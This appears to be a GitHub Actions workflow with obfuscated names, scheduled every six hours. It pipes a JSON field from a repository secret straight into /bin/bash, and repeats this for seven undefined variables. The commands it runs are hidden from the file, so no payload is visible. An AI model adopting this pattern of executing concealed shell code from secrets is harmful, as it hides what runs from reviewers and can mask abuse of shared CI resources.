name: wenziytx
on:
  workflow_dispatch:
  schedule:
    - cron: '20 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wenziytx
        env:
          ban1: ${{ secrets.ban1 }}
        run: |
          echo $ban1 | jq -r .ikh933 | /bin/bash
          echo $yk37 | jq -r .hfn672 | /bin/bash
          echo $eajb71285 | jq -r .ei9826 | /bin/bash
          echo $qnbl035 | jq -r .k88776 | /bin/bash
          echo $co67 | jq -r .ed20 | /bin/bash
          echo $pltd23925 | jq -r .b2621 | /bin/bash
          echo $saea1634 | jq -r .bl34846 | /bin/bash
          echo $x30 | jq -r .xpfgj7 | /bin/bash

